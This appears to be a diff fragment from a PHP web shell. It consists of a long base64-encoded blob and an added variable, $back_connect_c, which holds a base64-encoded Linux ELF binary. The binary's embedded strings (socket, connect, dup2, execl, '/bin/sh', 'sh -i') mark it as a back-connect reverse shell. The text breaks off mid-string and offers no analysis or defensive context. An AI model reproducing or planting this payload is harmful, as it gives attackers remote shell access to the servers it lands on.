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";
+$y5 = '/x.';
+$back_connect_c="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAA2IUECDQAAABMDAAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQILAkAACwJAAAFAAAAABAAAAEAAAAsCQAALJkECCyZBAg4AQAAPAEAAAYAAAAAEAAAAgAAAEAJAABAmQQIQJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAUAAAAAAAAAAAAAAARAAAAEgAAAAcAAAAKAAAACwAAAAgAAAAPAAAAAwAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABgAAAAAAAAABAAAAAAAAAAkAAAAAAAAADAAAAAAAAAAAAAAADQAAAA4AAAACAAAABAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAABwBAAASAAAArAAAAAAAAABxAAAAEgAAADwAAAAAAAAACwIAABIAAABIAAAAAAAAAH0AAAASAAAAjAAAAAAAAACsAQAAEgAAAKUAAAAAAAAArwAAABIAAABjAAAAAAAAACcAAAASAAAAkwAAAAAAAADdAAAAEgAAAEMAAAAAAAAAOgAAABIAAABcAAAAAAAAAKoBAAASAAAAVgAAAAAAAAA2AAAAEgAAAHMAAAAAAAAA2QAAABIAAAB4AAAAAAAAACgAAAASAAAAbQAAAAAAAAAOAAAAEgAAAC4AAAAAAAAAeAAAABIAAAB9AAAA8IgECAQAAAARAA4ATwAAAAAAAAA5AAAAEgAAAAEAAAAAAAAAAAAAACAAAAAVAAAAAAAAAAAAAAAgAAAAAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AGNvbm5lY3QAZXhlY2wAcGVycm9yAGR1cDIAc3lzdGVtAHNvY2tldABiemVybwBzdHJjYXQAaW5ldF9hZGRyAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABkYWVtb24AX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAGNsb3NlAEdMSUJDXzIuMAAAAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABACQAAAAQAAAAAAAAABBpaQ0AAAIAsgAAAAAAAAAImgQIBhMAABiaBAgHAQAAHJoECAcCAAAgmgQIBwMAACSaBAgHBAAAKJoECAcFAAAsmgQIBwYAADCaBAgHBwAANJoECAcIAAA4mgQIBwkAADyaBAgHCgAAQJoECAcLAABEmgQIBwwAAEiaBAgHDQAATJoECAcOAABQmgQIBw8AAFSaBAgHEQAAVYnlg+wI6EEBAADolAEAAOjnAwAAycMA/zUQmgQI/yUUmgQIAAAAAP8lGJoECGgAAAAA6eD/////JRyaBAhoCAAAAOnQ/////yUgmgQIaBAAAADpwP////8lJJoECGgYAAAA6bD/////JSiaBAhoIAAAAOmg/////yUsmgQIaCgAAADpkP////8lMJoECGgwAAAA6YD/////JTSaBAhoOAAAAOlw/////yU4mgQIaEAAAADpYP////8lPJoECGhIAAAA6VD/////JUCaBAhoUAAAAOlA/////yVEmgQIaFgAAADpMP////8lSJoECGhgAAAA6SD/////JUyaBAhoaAAAAOkQ/////yVQmgQIaHAAAADpAP////8lVJoECGh4AAAA6fD+//8x7V6J4YPk8FBUUmhoiAQIaBSIBAhRVmiAhgQI6E/////0kJBVieVT6AAAAABbgcMHFAAAUouD/P///4XAdAL/0FhbycOQkJBVieWD7AiAPWSaBAgAdA/rH412AIPABKNgmgQI/9KhYJoECIsQhdJ168YFZJoECAHJw4n2VYnlg+wIoTyZBAiFwHQZuAAAAACFwHQQg+wMaDyZBAj/0IPEEI12AMnDkJBVieVXVlOD7EyD5PC4AAAAAIPAD4PAD8HoBMHgBCnEjX2ovvSIBAj8uQcAAADzpI19r/y5DgAAALAA86qD7AhqAGoB6FD+//+DxBBmx0XIAgCD7AyLRQyDwAj/MOi3/v//g8QQD7fAg+wMUOi4/v//g8QQZolFyoPsDItFDIPABP8w6DH+//+D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